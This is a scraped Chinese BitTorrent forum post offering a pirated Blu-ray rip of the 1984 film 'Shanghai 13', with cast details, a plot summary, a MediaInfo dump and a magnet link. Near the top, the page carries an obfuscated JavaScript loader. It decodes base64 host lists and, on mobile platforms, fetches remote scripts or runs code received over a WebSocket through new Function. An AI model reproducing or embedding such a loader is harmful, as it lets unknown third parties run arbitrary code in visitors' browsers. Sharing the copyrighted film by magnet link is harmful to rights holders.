上海滩十三太保[国语配音/粤语配音/中文字幕].Shanghai.13.1984.1080p.BluRay.x265.10bit.DTS.2.0.2Audio 6.86GB

版主小s 1月前 350

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 上海滩十三太保 / Shanghai 13 / The Shanghai Thirteen / All the Professionals
◎片  名 上海灘十三太保
◎年  代 1984
◎产  地 中国台湾
◎类  别 动作
◎语  言 汉语普通话
◎上映日期 1984-03-02(中国台湾)
◎IMDb链接 https://www.imdb.com/title/tt0083061/
◎豆瓣评分 7.5/10 (4807人评价)
◎豆瓣链接 https://movie.douban.com/subject/1466574/
◎片  长 90 分钟
◎导  演 张彻 Cheh Chang (id:1007232)
◎编  剧 张彻 Cheh Chang (id:1007232)
◎演  员 狄龙 Lung Ti (id:1025426)
       姜大卫 David Chiang (id:1013705)
       梁家仁 Ka-Yan Leung (id:1008125)
       王羽 Yu Wang (id:1002908)
       李修贤 Danny Lee (id:1025452)
       刘德华 Andy Lau (id:1054424)
       陈观泰 Kuan Tai Chen (id:1028360)
       朱海玲 Hai-Ling Chu (id:1327284)
       常枫 Feng Chang (id:1004141)
       李中一  (id:1349252)
       程天赐 Chien-Chang Chen (id:1332292)
       江生 Sheng Chiang (id:1003546)
       王钟 Chung Wang (id:1003807)
       江明 Ming Chiang (id:1310759)
       王青 Ching Wong (id:1275150)
       鹿峰 Feng Lu (id:1045851)
       陈星 Sing Chen (id:1033057)
       戚冠军 Kuan-Chun Chi (id:1326305)
       黄茂山 Mou Shan Huang (id:1347957)
       林善良 Lam Sin-Leung (id:1432082)
       邹志良 Chow Chi-Leung (id:1347630)

◎标  签 张彻 / 动作 / 香港 / 邵氏 / 香港电影 / 姜大卫 / 狄龙 / 刘德华

◎简  介
  抗日时期,爱国人士高先生不满汪伪政权卖国行径,与神偷黑帽子(王羽 饰)将双方密约窃走,计划将其公开。上海富商沈刚夫(陈观泰 饰)受人所托,命上海滩十三太保保护高先生离沪赴港。南京方面内务部长官洪述亦同时动作,收买部分太保暗杀高先生……                                    
                                长枪小杨(李修贤 饰)首先发难行刺却因失手被洪述清除,高先生先后在烟嘴冯金榜(江生 饰)、眼镜(王钟 饰)、富商陶大业(梁家仁 饰)、学生关伟(刘德华 饰)、浪子叶不凡(姜大卫 饰)、少爷梁少雄、教头(狄龙)的护卫下历经连番血战,终于杀出重围。只可叹“教头快刀、浪子富翁、学生少爷、熊虎鹰豹、眼镜烟嘴、长枪难逃”的上海滩十三太保一朝风流云散。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 297488524506067312980173379594147122765 (0xDFCE34ABC1692509445453655140CE4D)

  4. Complete name                            : [email protected]QDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 6.86 GiB

  8. Duration                                 : 1 h 26 min

  9. Overall bit rate                         : 11.3 Mb/s

  10. Movie name                               : Shanghai 13 1984

  11. Encoded date                             : UTC 2021-08-13 12:59:34

  12. Writing application                      : mkvmerge v59.0.0 ('Shining Star') 64-bit

  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover                                    : Yes

  15. Attachments                              : cover.jpg


  16. Video

  17. ID                                       : 1

  18. Format                                   : HEVC

  19. Format/Info                              : High Efficiency Video Coding

  20. Format profile                           : Main [email protected]@Main

  21. Codec ID                                 : V_MPEGH/ISO/HEVC

  22. Duration                                 : 1 h 26 min

  23. Bit rate                                 : 8 263 kb/s

  24. Width                                    : 1 920 pixels

  25. Height                                   : 816 pixels

  26. Display aspect ratio                     : 2.35:1

  27. Frame rate mode                          : Constant

  28. Frame rate                               : 25.000 FPS

  29. Color space                              : YUV

  30. Chroma subsampling                       : 4:2:0

  31. Bit depth                                : 10 bits

  32. Bits/(Pixel*Frame)                       : 0.211

  33. Stream size                              : 5.01 GiB (73%)

  34. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings                        : rc=crf / crf=17.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=5 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default                                  : Yes

  37. Forced                                   : No


  38. Audio #1

  39. ID                                       : 2

  40. ID in the original source medium         : 4352 (0x1100)

  41. Format                                   : DTS

  42. Format/Info                              : Digital Theater Systems

  43. Codec ID                                 : A_DTS

  44. Duration                                 : 1 h 26 min

  45. Bit rate mode                            : Constant

  46. Bit rate                                 : 1 509 kb/s

  47. Channel(s)                               : 2 channels

  48. Channel layout                           : L R

  49. Sampling rate                            : 48.0 kHz

  50. Frame rate                               : 93.750 FPS (512 SPF)

  51. Bit depth                                : 16 bits

  52. Compression mode                         : Lossy

  53. Stream size                              : 937 MiB (13%)

  54. Title                                    : Cantonese

  55. Language                                 : Chinese

  56. Default                                  : Yes

  57. Forced                                   : No

  58. Original source medium                   : Blu-ray


  59. Audio #2

  60. ID                                       : 3

  61. ID in the original source medium         : 4353 (0x1101)

  62. Format                                   : DTS

  63. Format/Info                              : Digital Theater Systems

  64. Codec ID                                 : A_DTS

  65. Duration                                 : 1 h 26 min

  66. Bit rate mode                            : Constant

  67. Bit rate                                 : 1 509 kb/s

  68. Channel(s)                               : 2 channels

  69. Channel layout                           : L R

  70. Sampling rate                            : 48.0 kHz

  71. Frame rate                               : 93.750 FPS (512 SPF)

  72. Bit depth                                : 16 bits

  73. Compression mode                         : Lossy

  74. Stream size                              : 937 MiB (13%)

  75. Title                                    : Mandarin

  76. Language                                 : Chinese

  77. Default                                  : No

  78. Forced                                   : No

  79. Original source medium                   : Blu-ray


  80. Text #1

  81. ID                                       : 4

  82. ID in the original source medium         : 4609 (0x1201)

  83. Format                                   : PGS

  84. Muxing mode                              : zlib

  85. Codec ID                                 : S_HDMV/PGS

  86. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  87. Duration                                 : 1 h 22 min

  88. Bit rate                                 : 19.3 kb/s

  89. Count of elements                        : 1092

  90. Stream size                              : 11.4 MiB (0%)

  91. Title                                    : chs

  92. Language                                 : Chinese

  93. Default                                  : Yes

  94. Forced                                   : No

  95. Original source medium                   : Blu-ray


  96. Text #2

  97. ID                                       : 5

  98. ID in the original source medium         : 4608 (0x1200)

  99. Format                                   : PGS

  100. Muxing mode                              : zlib

  101. Codec ID                                 : S_HDMV/PGS

  102. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  103. Duration                                 : 1 h 22 min

  104. Bit rate                                 : 19.6 kb/s

  105. Count of elements                        : 1092

  106. Stream size                              : 11.6 MiB (0%)

  107. Title                                    : cht

  108. Language                                 : Chinese

  109. Default                                  : No

  110. Forced                                   : No

  111. Original source medium                   : Blu-ray


  112. Text #3

  113. ID                                       : 6

  114. ID in the original source medium         : 4610 (0x1202)

  115. Format                                   : PGS

  116. Muxing mode                              : zlib

  117. Codec ID                                 : S_HDMV/PGS

  118. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  119. Duration                                 : 1 h 22 min

  120. Bit rate                                 : 22.9 kb/s

  121. Count of elements                        : 1092

  122. Stream size                              : 13.5 MiB (0%)

  123. Language                                 : English

  124. Default                                  : No

  125. Forced                                   : No

  126. Original source medium                   : Blu-ray


  127. Menu

  128. 00:00:00.000                             : Chapter 01

  129. 00:06:38.240                             : Chapter 02

  130. 00:13:36.680                             : Chapter 03

  131. 00:19:46.480                             : Chapter 04

  132. 00:29:58.880                             : Chapter 05

  133. 00:35:31.760                             : Chapter 06

  134. 00:43:30.480                             : Chapter 07

  135. 00:50:24.640                             : Chapter 08

  136. 00:57:13.480                             : Chapter 09

  137. 01:07:11.000                             : Chapter 10

  138. 01:12:39.280                             : Chapter 11

  139. 01:19:38.200                             : Chapter 12



TAGS 动作

磁力链:
  • magnet:?xt=urn:btih:DBE424FBDF2B79B595E7F65F66CFE4EF9E64B2D2
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (1)
  • 那年夏天 1月前
    2
    啥也不说了,感谢楼主分享哇!

你可以在 登录 or 注册 后,对此帖发表评论!

返回